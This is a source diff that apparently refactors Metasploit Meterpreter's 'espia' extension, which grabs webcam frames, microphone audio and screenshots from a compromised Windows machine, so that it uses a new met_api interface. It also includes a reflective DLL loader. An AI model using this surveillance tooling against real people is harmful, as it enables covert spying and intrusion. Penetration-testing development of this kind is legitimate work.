diff --git a/c/meterpreter/source/extensions/espia/audio.c b/c/meterpreter/source/extensions/espia/audio.c
index 126b59d1..051bfd45 100644
--- a/c/meterpreter/source/extensions/espia/audio.c
+++ b/c/meterpreter/source/extensions/espia/audio.c
@@ -1,5 +1,5 @@
#define _CRT_SECURE_NO_DEPRECATE 1
-#include "../../common/common.h"
+#include "common.h"
#include <stdio.h>
#include <windows.h>
#include <tchar.h>
@@ -7,6 +7,7 @@
#include <stdlib.h>
#include <malloc.h>
#include "espia.h"
+#include "common_metapi.h"
#pragma comment(lib, "vfw32.lib")
#pragma comment(lib, "winmm.lib")
@@ -60,6 +61,7 @@ BOOL capmicaudio(char* szFile, int millisecs)
return (0L);
}
+// TODO: remove this junk?
int __declspec(dllexport) controlmic(char **waveresults, int msecs) {
DWORD dwError = 0;
char *wavestring = NULL;
@@ -80,24 +82,24 @@ int __declspec(dllexport) controlmic(char **waveresults, int msecs) {
/*
* Grabs the audio from mic.
*/
-DWORD request_audio_get_dev_audio(Remote *remote, Packet *packet)
+DWORD request_audio_get_dev_audio(Remote* remote, Packet* packet)
{
- Packet *response = packet_create_response(packet);
- DWORD res = ERROR_SUCCESS;
- char *wave = NULL;
+ Packet* response = met_api->packet.create_response(packet);
+ DWORD res = ERROR_SUCCESS;
+ char* wave = NULL;
- if (controlmic(&wave,packet_get_tlv_value_uint(packet, TLV_TYPE_DEV_RECTIME)))
- {
- res = GetLastError();
- }
+ if (controlmic(&wave, met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_DEV_RECTIME)))
+ {
+ res = GetLastError();
+ }
- //packet_add_tlv_string(response, TLV_TYPE_DEV_AUDIO, wave);
+ //met_api->packet.add_tlv_string(response, TLV_TYPE_DEV_AUDIO, wave);
- packet_transmit_response(res, remote, response);
+ met_api->packet.transmit_response(res, remote, response);
- if (wave)
- free(wave);
+ if (wave)
+ free(wave);
- return res;
+ return res;
}
diff --git a/c/meterpreter/source/extensions/espia/espia.c b/c/meterpreter/source/extensions/espia/espia.c
index ba5d81e1..c5e8a454 100644
--- a/c/meterpreter/source/extensions/espia/espia.c
+++ b/c/meterpreter/source/extensions/espia/espia.c
@@ -2,23 +2,21 @@
* This module implemenet webcam frae capture and mic recording features.
*/
#define _CRT_SECURE_NO_DEPRECATE 1
-#include "../../common/common.h"
+#include "common.h"
+#include "common_metapi.h"
#include "espia.h"
#include "audio.h"
#include "video.h"
#include "screen.h"
-#include "../../DelayLoadMetSrv/DelayLoadMetSrv.h"
+// Required so that use of the API works.
+MetApi* met_api = NULL;
+
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
-// NOTE: _CRT_SECURE_NO_WARNINGS has been added to Configuration->C/C++->Preprocessor->Preprocessor
-
-// this sets the delay load hook function, see DelayLoadMetSrv.h
-EnableDelayLoadMetSrv();
-
Command customCommands[] =
{
COMMAND_REQ( "espia_video_get_dev_image", request_video_get_dev_image ),
@@ -32,11 +30,11 @@ Command customCommands[] =
* @param remote Pointer to the remote instance.
* @return Indication of success or failure.
*/
-DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
+DWORD __declspec(dllexport) InitServerExtension(MetApi* api, Remote *remote)
{
- hMetSrv = remote->met_srv;
+ met_api = api;
- command_register_all( customCommands );
+ met_api->command.register_all( customCommands );
return ERROR_SUCCESS;
}
@@ -48,7 +46,7 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
*/
DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
{
- command_deregister_all( customCommands );
+ met_api->command.deregister_all( customCommands );
return ERROR_SUCCESS;
}
diff --git a/c/meterpreter/source/extensions/espia/screen.c b/c/meterpreter/source/extensions/espia/screen.c
index c606a820..98d6d4fe 100644
--- a/c/meterpreter/source/extensions/espia/screen.c
+++ b/c/meterpreter/source/extensions/espia/screen.c
@@ -1,5 +1,5 @@
#define _CRT_SECURE_NO_DEPRECATE 1
-#include "../../common/common.h"
+#include "common.h"
#include <stdio.h>
#include <windows.h>
#include <tchar.h>
@@ -9,6 +9,7 @@
#include <wingdi.h>
#include "espia.h"
#include "screen.h"
+#include "common_metapi.h"
/* Function modified to store bitmap in memory. et [ ] metasploit.com
@@ -827,7 +828,6 @@ int convert_bmp_and_send(HBITMAP hBmp, HDC hDC, Packet *resp){
memcpy(buf+sizeof(BITMAPFILEHEADER),(LPVOID) pbih, sizeof(BITMAPINFOHEADER)+ pbih->biClrUsed * sizeof (RGBQUAD));
memcpy(buf+sizeof(BITMAPFILEHEADER)+ (sizeof(BITMAPINFOHEADER)+ pbih->biClrUsed * sizeof (RGBQUAD)),(LPSTR) hp, (int) cb);
// Don't send it yet. Convert it to a JPEG.
- //packet_add_tlv_raw(resp, TLV_TYPE_DEV_SCREEN, buf, s);
// JPEG conversion start here..'
@@ -875,7 +875,7 @@ int convert_bmp_and_send(HBITMAP hBmp, HDC hDC, Packet *resp){
(*src_mgr->finish_input) (&cinfo, src_mgr);
jpeg_finish_compress(&cinfo);
jpeg_destroy_compress(&cinfo);
- packet_add_tlv_raw(resp, TLV_TYPE_DEV_SCREEN, buf_jpeg, buf_jpeg_size);
+ met_api->packet.add_tlv_raw(resp, TLV_TYPE_DEV_SCREEN, buf_jpeg, buf_jpeg_size);
// Is it safe to free this right after pack_add_tlv_raw?
free(buf_jpeg);
@@ -896,7 +896,7 @@ int convert_bmp_and_send(HBITMAP hBmp, HDC hDC, Packet *resp){
*/
DWORD request_image_get_dev_screen(Remote *remote, Packet *packet)
{
- Packet *response = packet_create_response(packet);
+ Packet *response = met_api->packet.create_response(packet);
DWORD dwResult = ERROR_ACCESS_DENIED;
HWINSTA hWindowStation = NULL;
HWINSTA hOrigWindowStation = NULL;
@@ -1045,7 +1045,7 @@ DWORD request_image_get_dev_screen(Remote *remote, Packet *packet)
if (hInputDesktop)
CloseDesktop(hInputDesktop);
- packet_transmit_response(dwResult, remote, response);
+ met_api->packet.transmit_response(dwResult, remote, response);
return dwResult;
}
diff --git a/c/meterpreter/source/extensions/espia/video.c b/c/meterpreter/source/extensions/espia/video.c
index 5631530e..397279e6 100644
--- a/c/meterpreter/source/extensions/espia/video.c
+++ b/c/meterpreter/source/extensions/espia/video.c
@@ -1,4 +1,4 @@
-#include "../../common/common.h"
+#include "common.h"
#include <stdio.h>
#include <windows.h>
#include <psapi.h>
@@ -9,6 +9,7 @@
#include <malloc.h>
#include <vfw.h>
#include "espia.h"
+#include "common_metapi.h"
#pragma comment(lib, "vfw32.lib")
@@ -73,6 +74,7 @@ char *StringCombine(char *string1, char *string2) {
return string1;
}
+// TODO: remove this junk?!
int __declspec(dllexport) controlcam(char **imageresults) {
DWORD dwError = 0;
char *imagestring = NULL;
@@ -104,11 +106,11 @@ int __declspec(dllexport) controlcam(char **imageresults) {
/*
* Grabs the Webcam Image.
*/
-DWORD request_video_get_dev_image(Remote *remote, Packet *packet)
+DWORD request_video_get_dev_image(Remote* remote, Packet* packet)
{
- Packet *response = packet_create_response(packet);
+ Packet* response = met_api->packet.create_response(packet);
DWORD res = ERROR_SUCCESS;
- char *image = NULL;
+ char* image = NULL;
do
{
@@ -118,14 +120,14 @@ DWORD request_video_get_dev_image(Remote *remote, Packet *packet)
break;
}
- //packet_add_tlv_string(response, TLV_TYPE_DEV_IMAGE, image);
+ //met_api->packet.add_tlv_string(response, TLV_TYPE_DEV_IMAGE, image);
} while (0);
- packet_transmit_response(res, remote, response);
+ met_api->packet.transmit_response(res, remote, response);
if (image)
- free(image);
+ free(image);
return res;
}
\ No newline at end of file
diff --git a/c/meterpreter/source/extensions/priv/server/priv.c b/c/meterpreter/source/extensions/priv/server/priv.c
index d6173105..03e196ec 100644
--- a/c/meterpreter/source/extensions/priv/server/priv.c
+++ b/c/meterpreter/source/extensions/priv/server/priv.c
@@ -2,8 +2,7 @@
* @brief This module implements privilege escalation features.
*/
#include "precomp.h"
-#include "common_metapi.h"
-
+#include "common_metapi.h"
// Required so that use of the API works.
MetApi* met_api = NULL;
diff --git a/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj b/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj
index 74cb4d19..aa2671e2 100644
--- a/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj
+++ b/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj
@@ -86,7 +86,7 @@
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
- <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+ <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@@ -138,7 +138,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
- <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+ <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@@ -193,7 +193,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
- <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+ <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@@ -245,7 +245,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
- <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+ <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>